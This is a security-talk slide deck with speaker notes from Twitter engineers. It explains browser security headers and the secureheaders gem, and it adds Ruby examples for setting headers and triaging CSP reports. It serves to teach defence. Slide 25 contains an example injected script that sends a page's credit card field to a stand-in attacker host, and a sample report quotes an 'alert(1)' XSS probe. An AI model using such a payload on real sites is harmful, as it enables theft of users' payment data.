Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
11. Do you use these?
Content Security Policy (CSP)
X-Frame-Options
HTTP Strict Transport Security (HSTS)
X-XSS-Protection
X-Content-Type-Options
@ocrails | @ndm
12. X-Content-Type-Options
Stops MIME-sniffing attacks: the browser must honour the declared Content-Type instead of guessing one (e.g. treating a user-uploaded "image" as HTML or script)
Introduced by IE, because only IE sniffed that aggressively; Chrome honours it as well
X-Content-Type-Options: nosniff
zzzzZZZZZZzzzzz
13. X-XSS-Protection
Turns on the browser's built-in XSS Auditor (IE and WebKit/Chrome; Firefox never shipped one)
Syntax: X-XSS-Protection: 0 | 1 | 1; mode=block
0 disables the filter, 1 tries to sanitise the reflected script, mode=block refuses to render the page at all
X-XSS-Protection: 1; mode=block
Caveat: Chrome removed the XSS Auditor in 2019, and current guidance is to send X-XSS-Protection: 0 and rely on CSP instead
(SCREENSHOT OF BLOCKED SCRIPT)
zzzzZZZ... huh? zzzzzzzz
14. X-Frame-Options
Protects you from most classes of Clickjacking (an attacker frames your page in an invisible iframe and tricks the user into clicking through it)
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM https://example.com
ALLOW-FROM takes a single origin, was only ever honoured by IE and Firefox, and is obsolete; use the CSP frame-ancestors directive when you need a list of permitted framers
zzz... oh hey, that's cool. Don't frame my stuff.
16. Firesheep/SSL Strip
Given I haven't received an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
(the plaintext request carries my session cookie, so anyone on the network can read it with Firesheep, or strip the redirect to https and keep me on plain http)
17. Other SSL fails
Posting passwords over HTTP
Loading mixed content (an https page pulling scripts or other assets over http, which a MITM can rewrite)
Using protocol-relative URLs (//cdn.example.com/x.js inherits whatever scheme the page was loaded with)
19. How hard is it to use?
Base case
Strict-Transport-Security: max-age=10000000
Do all of your subdomains support SSL? If so:
Strict-Transport-Security: max-age=10000000; includeSubDomains
max-age is in seconds (10000000 is about 116 days); the browser remembers the policy for that long and upgrades later requests itself, so the plaintext request from the Firesheep scenario never happens again
The header is only honoured on an https response, and the very first visit is still unprotected unless the site is on the browsers' HSTS preload list
(SSL FOR DUMMIES PICTURE)
20. Content secur-a-wat?
Content Security Policy is reshaping the browser security model
It is a complicated spec with big differences across browsers
It is not widely adopted
However,
With inline script disallowed it eliminates almost all reflected and stored XSS, because injected script can't run
It ensures that you never load mixed content
It can protect users with infected browsers (injected scripts from origins you didn't whitelist are blocked)
It lets you accept user-supplied HTML far more safely, because inline <script> blocks, on* event handlers and javascript: URIs won't execute
@owaspoc Jan 2013
@ndm | @presidentbeef
23. Get rid of XSS, eh?
A script-src directive that doesn't contain 'unsafe-inline' blocks almost every form of cross-site scripting, because an injected <script> block, on* handler or javascript: URI is inline script and never runs.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
25. But I have to...
OK, then I'll inject:
<script>
var image = new Image();
image.src = "https://cyberhacker.com/steal?data=" + $('#credit_card').val();
</script>
FALSE! The injected <script> is inline, so it never runs. Even a script that did run would trip an img-src violation on the cross-origin image load, and an XHR would trip connect-src (xhr-src in the old Firefox syntax). No exfiltration either way.
29. How to apply?
Secure headers!
Open sourced earlier this month
https://github.com/twitter/secureheaders
30. How does it work?
It sets a Rails before_filter that applies each header to the response
Values come from options passed to the filter, or from an initializer
Easily overridden per controller or action
Secure by default!!!
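The "secure defaults, overridable per app, headers applied on every response" idea looks like this when written out as a plain Rack-style middleware. This is an added illustration, not the secureheaders gem's code: the class name, option names, defaults and the /csp_report endpoint are this example's own, only the Rack convention (call(env) returning [status, headers, body], env['rack.url_scheme']) is assumed, and it emits only the standard Content-Security-Policy header rather than the old X-Content-Security-Policy / X-WebKit-CSP variants.

```ruby
# Added example: a minimal Rack-style middleware that applies the headers
# from this deck with secure defaults and per-app overrides. It is NOT the
# secureheaders gem's code; class, option and default names are this
# example's own. Only the Rack convention (call(env) -> [status, headers,
# body], env['rack.url_scheme']) is assumed, so no gems are required.
class SecureHeadersExample
  # Secure defaults. Pass nil for a header to suppress it.
  DEFAULT_HEADERS = {
    'X-Content-Type-Options'    => 'nosniff',
    'X-XSS-Protection'          => '1; mode=block',
    'X-Frame-Options'           => 'SAMEORIGIN',
    'Strict-Transport-Security' => 'max-age=10000000'
  }.freeze

  # Default CSP: same-origin everything, no 'unsafe-inline' for scripts,
  # violation reports posted back to the app (assumed endpoint /csp_report).
  DEFAULT_CSP = {
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],
    'img-src'     => ["'self'"],
    'report-uri'  => ['/csp_report']
  }.freeze

  def initialize(app, headers: {}, csp: {}, report_only: false)
    @app         = app
    @headers     = DEFAULT_HEADERS.merge(headers)
    @csp         = DEFAULT_CSP.merge(csp)
    @report_only = report_only
  end

  def call(env)
    status, app_headers, body = @app.call(env)
    # The app's own headers win, so a single action can still override.
    [status, security_headers(env).merge(app_headers), body]
  end

  # The header set for one request. HSTS is only emitted on https
  # responses: browsers ignore it over plain http anyway.
  def security_headers(env)
    out = @headers.reject { |_, v| v.nil? }
    out.delete('Strict-Transport-Security') unless env['rack.url_scheme'] == 'https'
    name = @report_only ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy'
    out[name] = self.class.build_csp(@csp)
    out
  end

  # "default-src 'self'; script-src 'self' https://cdn.example.com; ..."
  def self.build_csp(directives)
    directives.reject { |_, v| v.nil? }
              .map { |d, sources| "#{d} #{Array(sources).join(' ')}" }
              .join('; ')
  end

  # HSTS value builder: only add includeSubDomains when every subdomain
  # really serves TLS, because the browser will refuse http to all of them.
  def self.hsts(max_age: 10_000_000, include_subdomains: false)
    value = "max-age=#{max_age}"
    value += '; includeSubDomains' if include_subdomains
    value
  end
end

# Usage: wrap a trivial app and print the headers it now emits.
if __FILE__ == $PROGRAM_NAME
  app = ->(_env) { [200, { 'Content-Type' => 'text/html' }, ['<h1>hi</h1>']] }
  mw  = SecureHeadersExample.new(
    app,
    headers: { 'Strict-Transport-Security' => SecureHeadersExample.hsts(include_subdomains: true) },
    csp: { 'script-src' => ["'self'", 'https://cdn.example.com'] }
  )
  _, h, _ = mw.call('rack.url_scheme' => 'https', 'PATH_INFO' => '/')
  h.each { |k, v| puts "#{k}: #{v}" }
end
```

Two design points worth copying: the app's own response headers take precedence over the middleware's, so an override is a one-liner in the action that needs it, and HSTS is dropped on http responses so the header is never emitted where it cannot be honoured.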
31. What about that security policy thingy
There are > 6 differences between these two header values
33. Long hair don't care
About browser inconsistencies: you write one policy and the gem emits the header each browser understands
34. Other features
Set separate policies for http and https
Autofill chrome-extension: as an allowed source, so extension-injected content doesn't show up as violations (becoming part of the spec)
Autofill missing directives with the default-src value (becoming part of the spec)
35. You mean there’s more on CSP?
The browser sends reports!
36. What does the report look like?
{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}
37. Quiz: what does this report indicate?
{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81
}
}
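My reading of the quiz report: the browser refused to run an inline script ("alert(1)", the classic XSS probe) at line 81 of /welcome, so either a whitehat was testing you or you still have an inline script on that page. Reports like the two above are worth triaging automatically so the livereload noise doesn't drown out the real thing. The script below is an added example, not the gem's code: the categories, severities and helper names are this example's own, the two deck reports are reproduced as sample input, and two further samples (mixed content, a browser extension) are constructed here to exercise the other branches.

```ruby
# Added example: offline triage of CSP violation reports like the two in the
# deck. Not the gem's code; categories, severities and helper names are this
# example's own. Samples 3 and 4 are constructed for illustration.
require 'json'
require 'uri'

module CspReportTriage
  Result = Struct.new(:category, :severity, :detail)

  SAMPLE_REPORTS = [
    # Deck slide 36: LiveReload's websocket blocked during development
    '{"csp-report":{"document-uri":"http://localhost:3000/home","referrer":"",
      "blocked-uri":"ws://localhost:35729/livereload",
      "violated-directive":"xhr-src ws://localhost.twitter.com:*"}}',
    # Deck slide 37 (the quiz)
    '{"csp-report":{"document-uri":"http://example.com/welcome","referrer":"",
      "blocked-uri":"self","violated-directive":"inline script base restriction",
      "source-file":"http://example.com/welcome","script-sample":"alert(1)","line-number":81}}',
    # Constructed: an https page pulling a script over plain http
    '{"csp-report":{"document-uri":"https://example.com/account",
      "blocked-uri":"http://cdn.example.net/app.js","violated-directive":"script-src https:"}}',
    # Constructed: a browser extension injecting its own script
    '{"csp-report":{"document-uri":"https://example.com/",
      "blocked-uri":"chrome-extension://abcdef/inject.js","violated-directive":"script-src \'self\'"}}'
  ].freeze

  # Classify one report body. Accepts the {"csp-report": {...}} wrapper or the
  # bare inner object, and either the old violated-directive or the newer
  # effective-directive field.
  def self.classify(json_text)
    r = JSON.parse(json_text)
    r = r['csp-report'] || r
    doc       = r['document-uri'].to_s
    blocked   = r['blocked-uri'].to_s
    directive = (r['effective-directive'] || r['violated-directive']).to_s

    # Old Firefox reports say "inline script base restriction"; newer browsers
    # report blocked-uri "inline" (or "self") against a script-src directive.
    inline_script = directive.start_with?('inline script') ||
                    (%w[self inline].include?(blocked) && directive.include?('script'))

    if inline_script
      Result.new(:inline_script, :high,
                 "inline script blocked in #{doc} line #{r['line-number']}: #{r['script-sample'].inspect}")
    elsif blocked.start_with?('chrome-extension://', 'moz-extension://', 'safari-extension://')
      Result.new(:extension_noise, :info, "extension injected #{blocked}")
    elsif local_dev_socket?(blocked)
      Result.new(:dev_noise, :info, "local dev tooling: #{blocked}")
    elsif doc.start_with?('https://') && blocked.start_with?('http://')
      Result.new(:mixed_content, :medium, "#{doc} loaded #{blocked} over plain http")
    else
      Result.new(:other, :low, "#{directive} blocked #{blocked}")
    end
  end

  # LiveReload-style websockets on the developer's own machine.
  def self.local_dev_socket?(blocked)
    uri = URI.parse(blocked)
    %w[ws wss].include?(uri.scheme) && %w[localhost 127.0.0.1].include?(uri.host)
  rescue URI::InvalidURIError
    false
  end

  # Aggregate a batch into category => count, the shape you'd chart from a
  # report pipeline.
  def self.summarize(json_texts)
    json_texts.each_with_object(Hash.new(0)) { |t, counts| counts[classify(t).category] += 1 }
  end
end

if __FILE__ == $PROGRAM_NAME
  CspReportTriage::SAMPLE_REPORTS.each do |json|
    res = CspReportTriage.classify(json)
    puts "#{res.severity.to_s.upcase.ljust(6)} #{res.category}: #{res.detail}"
  end
end
```

Run with report-only mode first: the dev_noise and extension_noise buckets show you what a policy would break (and what to whitelist) before enforcement turns every one of those into a broken page.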
38. Header gem to the rescue
It forwards CSP reports for Firefox
It makes switching between enforce and report-only mode easy, so you can run report-only first and watch the reports before you enforce anything
Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Talk about http basic authorization
Many of these headers not only encourage best practices but also provide a better user experience and save resources
Take a survey
save resources since nothing is framed
Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
hsts preload and max-age
Explain how redirecting to https doesn’t protect the initial request Save round trip
Explain mixed content: MITM'd assets
Firesheep: cookies sent in the clear
Supported in WebKit (PhantomJS)
Accept arbitrary HTML safely because inserted scripts won't execute: on* events, javascript: URIs; restrict using eval
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful XSS attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and by a variety of one-off methods.
strings or hashes
Yeah, some browsers protect you, but not all support it
Content Security Policy defines what can "run" on a page, and any deviation creates an alert. Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed content by leveraging the reports sent to us by the users' browsers. This complements the static and dynamic analysis provided by Brakeman and phantom-gang in a unique way, as we are receiving information from the user. We send the CSP reports to a central Scribe host (describe: a massively scalable endpoint to collect and aggregate large amounts of data), which writes to the Hadoop file system, which we can run "big data" reports against using Pig/Scalding. We send this information to SADB where we can search and sort more easily.